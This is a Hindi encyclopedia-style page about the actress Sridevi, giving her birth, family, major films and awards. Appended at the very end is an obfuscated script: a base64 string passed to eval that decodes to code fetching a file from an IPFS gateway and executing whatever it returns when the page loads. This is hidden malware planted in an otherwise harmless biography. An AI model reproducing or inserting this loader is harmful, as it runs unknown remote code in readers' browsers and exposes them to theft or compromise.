श्रीदेवी

भारत डिस्कवरी प्रस्तुति
रिंकू बघेल (चर्चा | योगदान) द्वारा परिवर्तित 13:29, 8 जून 2017 का अवतरण ('{{सूचना बक्सा कलाकार |चित्र=Sridevi.jpg |चित्र का नाम=श्रीदे...' के साथ नया पृष्ठ बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें
श्रीदेवी
श्रीदेवी
प्रसिद्ध नाम श्रीदेवी
जन्म 13 अगस्त, 1963
जन्म भूमि तमिलनाडु
अभिभावक पिता- अय्यपन, माता- राजेश्वरी
पति/पत्नी बोनी कपूर
संतान पुत्री- जाह्नवी कपूर, ख़ुशी कपूर
कर्म भूमि भारत
कर्म-क्षेत्र भारतीय सिनेमा
मुख्य फ़िल्में 'जूली', 'सोलवां सावन', 'सदमा', 'हिम्मतवाला', 'नगीना', 'मिस्टर इंडिया', 'निगाहें', 'चालबाज़', 'चांदनी', 'लाडला', 'इंग्लिश विंग्लिश'।
पुरस्कार-उपाधि पद्मश्री
प्रसिद्धि अभिनेत्री
नागरिकता भारतीय
अन्य जानकारी श्रीदेवी ने मुख्यधारा के सिनेमा के अलावा कई आर्ट फ़िल्मों मे भी काम किया, जिसे भारत में पैरलल सिनेमा कहा जाता हैै।
बाहरी कड़ियाँ श्रीदेवी

श्रीदेवी (अंग्रेज़ी: Sridevi, जन्म- 13 अगस्त, 1963, तमिलनाडु) भारतीय सिनेमा की मशहूर अदाकारा हैं। वह सिनेमा की दुनिया में श्रीदेवी के नाम से प्रख्यात हैं। उन्होंने हिंदी फ़िल्मों के अलावा तमिल, मलयालम, तेलुगु, कन्नड़ फ़िल्मों में भी काम किया है। श्रीदेवी ने अपने कॅरियर की शुरुआत 1979 में फ़िल्म 'सोलवां सावन' से की थी। लेकिन उन्हें बॉलीवुड में पहचान फ़िल्म 'हिम्मतवाला' से मिली। इस फ़िल्म के बाद वह हिंदी सिनेमा की सुपरस्टार अभिनेत्रियों में शुमार हो गयीं। उन्हें तीन बार फ़िल्मफेयर पुरस्कार मिल चुका है। 2013 में उन्हें भारत सरकार की ओर से पद्मश्री सम्मान से भी नवाजा गया।

परिचय

श्रीदेवी का जन्म 13 अगस्त, 1963 को तमिलनाडु में हुआ था। उनके पिता अय्यपन हैं- जोकि एक वकील हैं। उनकी माँ का नाम राजेश्वरी है। उनकी एक बहन और दो सौतेले भाई हैं। बहन का नाम- श्रीलता और भाईयों के नाम आनंद और सतीश हैं। उनका विवाह निर्देशक बोनी कपूर के साथ हुआ था। उनकी दो बेटियाँ जाह्नवी और खुशी हैं।

श्रीदेवी भारतीय सिनेमा की जानी मानी हस्तियों में शामिल हैं। अपनी फ़िल्मों में अपने बेहतरीन डांस और अदाओं से दर्शकों के दिलोदिमाग पर जादू कर देने वाली इस अदकारा ने 'मवाली', 'तोहफा', 'मिस्टर इंडिया', 'हिम्मतवाला', 'खुदा गवाह', 'चालबाज', 'नगीना' और 'लम्हे' जैसी बेहतरीन फ़िल्मों में काम किया।[1]

फ़िल्मी कॅरियर

श्रीदेवी ने अपने वयस्क कॅरियर की शुरुआत साल 1979 में हिंदी फ़िल्म 'सोलवां सावन' से की थी। हालंकि उन्हें बॉलीवुड में पहचान 1983 में आई फ़िल्म 'हिम्मतवाला' से मिली। इस फ़िल्म में उनके अपोजिट जितेंद्र नजर आये थे। यह फ़िल्म 1983 की ब्लॉकस्बस्टर फ़िल्म थी। इसके बाद उन्होंने कई फ़िल्में जितेन्द्र के साथ की। उसके बाद उनकी फ़िल्म 'तोहफा' आई जिसने उस दौर में कमाई के सारे रिकॉर्ड तोड़ दिए थे।[1]

सम्मान एवं पुरस्कार

श्रीदेवी ने अपने कॅरियर में बहुत सी हिट फ़िल्में की और विभिन्न पुरस्कार प्राप्त किए। उन्हें वर्ष 2013 भारत सरकार द्वारा पद्मश्री और 2003 में 'लच्छू महाराज पुरस्कार' से सम्मानित किया गया था। 2013 - भारत सरकार द्वारा भारत के चौथे उच्चतम नागरिक पुरस्कार पद्मश्री से सम्मानित। 2003 - भारतीय सिनेमा में विशेष योगदान के लिए श्रीदेवी को लच्छू महाराज पुरस्कार से सम्मानित किया गया।

  • फ़िल्मफेयर पुरस्कार[1]
  1. फिल्मफेयर स्पेशल अवार्ड- 'नगीना' और 'मिस्टर इंडिया' (2013)।
  2. फिल्मफेयर सर्वश्रेष्ठ अभिनेत्री- 'लम्हे' (1992)।


श्रीदेवी विषय सूची


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 1.2 श्रीदेवी कपूर (हिंदी) hindi.filmibeat.com। अभिगमन तिथि: 08 जून, 2017।

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>